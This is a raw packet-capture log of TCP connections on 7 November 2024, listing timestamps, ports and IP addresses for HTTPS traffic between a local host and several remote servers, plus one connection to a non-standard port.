Nov 7, 2024 07:33:20.919327974 CET	443	49863	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.919375896 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.919384956 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.981617928 CET	443	49864	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.988138914 CET	49864	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.988157988 CET	443	49864	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.988878012 CET	49864	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.988882065 CET	443	49864	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.008047104 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.008084059 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.008109093 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.008119106 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.008172989 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.008923054 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.012558937 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.012680054 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.012681007 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.012691975 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.012731075 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.022495031 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.030570030 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.030595064 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.030642986 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.030653000 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.030915976 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.032197952 CET	443	49863	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.032283068 CET	443	49863	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.032345057 CET	49863	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:21.038255930 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.038381100 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.038425922 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.038431883 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.038451910 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.038511038 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.038517952 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.038743019 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.047601938 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.047631025 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.047650099 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.047658920 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.047703028 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.055814028 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.063823938 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.063855886 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.063961983 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.063971043 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.064032078 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.071799040 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.078429937 CET	49873	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:21.078449965 CET	443	49873	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.078588009 CET	49873	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:21.079027891 CET	49873	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:21.079041958 CET	443	49873	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.087874889 CET	49863	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:21.087891102 CET	443	49863	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.116669893 CET	443	49864	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.116720915 CET	443	49864	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.116827011 CET	49864	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.126724958 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.126764059 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.126801968 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.126812935 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.126867056 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.126945019 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.127051115 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.127089977 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.127096891 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.127389908 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.127435923 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.127475023 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.127482891 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.127530098 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.131350994 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.131578922 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.131608963 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.131630898 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.131639004 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.131800890 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.140361071 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.144905090 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.145000935 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.145045042 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.145052910 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.145107985 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.158809900 CET	49864	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.158822060 CET	443	49864	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.158859015 CET	49864	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.158864021 CET	443	49864	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.163913965 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.164180040 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.164213896 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.164232969 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.164242029 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.164294958 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.164520979 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.164613008 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.164813995 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.167931080 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.168005943 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.168010950 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.168019056 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.168057919 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.174135923 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.179959059 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.180001974 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.180010080 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.186022997 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.186095953 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.186101913 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.192168951 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.192231894 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.192233086 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.192241907 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.192281008 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.198014975 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.204005003 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.204047918 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.204086065 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.204093933 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.204323053 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.210241079 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.215998888 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.216042042 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.216048956 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.221368074 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.221385956 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.221394062 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.222115993 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.245635986 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.245758057 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.245788097 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.245798111 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.245870113 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.245932102 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.246220112 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.246249914 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.246303082 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.246310949 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.246387005 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.246481895 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.250272036 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.250428915 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.250436068 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.311031103 CET	49874	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.311058044 CET	443	49874	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.311212063 CET	49874	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.330827951 CET	49875	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:21.330842972 CET	443	49875	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.330935955 CET	49875	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:21.331326962 CET	49875	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:21.331336021 CET	443	49875	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.389580011 CET	49874	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.389599085 CET	443	49874	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.402164936 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.402180910 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.486700058 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.486747980 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.486751080 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.486768007 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.486807108 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.486813068 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.486859083 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.486896992 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.486915112 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.486922026 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.486963034 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.486978054 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.486984015 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.487020969 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.487035036 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.487041950 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.487107992 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.487143040 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.487150908 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.487158060 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.487180948 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.487215042 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.487258911 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.487265110 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.489343882 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.489387035 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.489418983 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.489427090 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.489470959 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.489510059 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.489578009 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.489751101 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.489758015 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.490530014 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.490564108 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.490591049 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.490597963 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.490745068 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.491185904 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.491276979 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.491341114 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.491347075 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.493055105 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.493171930 CET	443	49865	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.493201971 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.493208885 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.493592024 CET	443	49866	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.493771076 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.493947983 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.493978024 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.493987083 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.493997097 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.494021893 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.494147062 CET	443	49868	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.494277954 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.494309902 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.494323969 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.494330883 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.494365931 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.494400024 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.494401932 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.494410038 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.494436979 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.494786024 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.494838953 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.494837999 CET	443	49867	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.494844913 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.494987011 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.495102882 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.495109081 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.495434999 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.495469093 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.495484114 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.495491982 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.495687008 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.495739937 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.496260881 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.496293068 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.496329069 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.496336937 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.496567011 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.496609926 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.496612072 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.496618986 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.496644974 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.497205973 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.497266054 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.497273922 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.497386932 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.497427940 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.497435093 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.497996092 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.498039007 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.498054028 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.498064041 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.498271942 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.498306036 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.498775959 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.498810053 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.498822927 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.498830080 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.498864889 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.498953104 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.499571085 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.499618053 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.499625921 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.500057936 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.500101089 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.500108004 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.500374079 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.500416994 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.500423908 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.500634909 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.500878096 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.522874117 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.545488119 CET	49865	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.545496941 CET	49866	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.545494080 CET	49868	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.551697016 CET	49865	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.551706076 CET	443	49865	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.552164078 CET	49865	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.552170038 CET	443	49865	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.552510977 CET	49866	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.552516937 CET	443	49866	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.552922010 CET	49866	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.552926064 CET	443	49866	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.553174019 CET	49868	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.553188086 CET	443	49868	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.553539991 CET	49868	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.553545952 CET	443	49868	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.553791046 CET	49867	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.553802013 CET	443	49867	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.554172993 CET	49867	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.554177046 CET	443	49867	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.592048883 CET	49876	56001	192.168.2.4	162.230.48.189
Nov 7, 2024 07:33:21.599129915 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.599139929 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.600131035 CET	56001	49876	162.230.48.189	192.168.2.4
Nov 7, 2024 07:33:21.600195885 CET	49876	56001	192.168.2.4	162.230.48.189
Nov 7, 2024 07:33:21.603321075 CET	49876	56001	192.168.2.4	162.230.48.189
Nov 7, 2024 07:33:21.611227989 CET	56001	49876	162.230.48.189	192.168.2.4
Nov 7, 2024 07:33:21.626748085 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.626786947 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.626842976 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.628180027 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.628191948 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.676709890 CET	443	49865	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.676789045 CET	443	49865	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.676862001 CET	49865	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.677215099 CET	443	49866	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.677239895 CET	443	49866	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.677274942 CET	443	49866	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.677309990 CET	49866	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.677325964 CET	49866	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.679769039 CET	49876	56001	192.168.2.4	162.230.48.189
Nov 7, 2024 07:33:21.680833101 CET	443	49868	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.680974960 CET	443	49868	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.681019068 CET	49868	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.684603930 CET	56001	49876	162.230.48.189	192.168.2.4
Nov 7, 2024 07:33:21.689589024 CET	443	49867	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.689631939 CET	443	49867	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.689680099 CET	49867	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.694597006 CET	49865	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.694607019 CET	443	49865	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.694629908 CET	49865	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.694634914 CET	443	49865	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.695142984 CET	49866	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.695153952 CET	443	49866	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.695180893 CET	49866	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.695185900 CET	443	49866	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.697068930 CET	49868	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.697068930 CET	49868	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.697093010 CET	443	49868	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.697103977 CET	443	49868	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.701491117 CET	49867	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.701494932 CET	443	49867	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.701504946 CET	49867	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.701508045 CET	443	49867	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.705430031 CET	49878	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.705447912 CET	443	49878	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.705533028 CET	49878	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.711932898 CET	49879	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.711958885 CET	443	49879	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.712193012 CET	49879	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.712774992 CET	49878	443	192.168.2.4	13.107.246.45
